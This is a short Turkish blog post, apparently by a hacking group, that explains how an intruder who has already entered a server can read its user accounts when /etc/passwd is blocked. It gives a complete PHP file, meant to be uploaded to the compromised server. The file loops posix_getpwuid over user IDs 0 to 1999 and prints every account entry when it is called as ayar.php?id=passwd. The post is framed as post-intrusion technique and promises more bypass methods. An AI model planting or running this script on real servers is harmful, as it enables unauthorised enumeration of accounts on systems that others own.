Kar Amacı Gütmeyen Blog

Posix_getpwuid Fonksiyonu ile Config Okumak

etc/passwd
{ Merhaba AyarSecurity Takipçileri, Bir servera girdiniz varsayalım,
passwd okumaya çalıştınız ama okuyamadınız, o zaman imdadımıza 
posix_getwuid fonksiyonu yetişiyor.
Serverda bu fonksiyon engellenmiş olmamalı, Eğer engellenmiş ise
ilerki yazılarımda diğer çözüm yollarını sizlere elimden geldiğince aktarmaya çalışacağım.
Bunun için ise öncelikle serverde bir php dosyası oluşturmamız gerekli.
<?php // Ayar Bypassed
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
 Örnek olarak; ayar.php  oluşturup içine yukarıdakileri ekleyin.
ayar.php?id=passwd
ve şu şekilde sonuna ekleyerek görebilirsiniz.
Eğer hala okuyamıyorsanızda ilerleyen zamanlarda başka yöntemlerle görüşmek üzere }

~ Hedef 2040 Yaşlı Bir Morrruk Olana Kadar Buradayım ~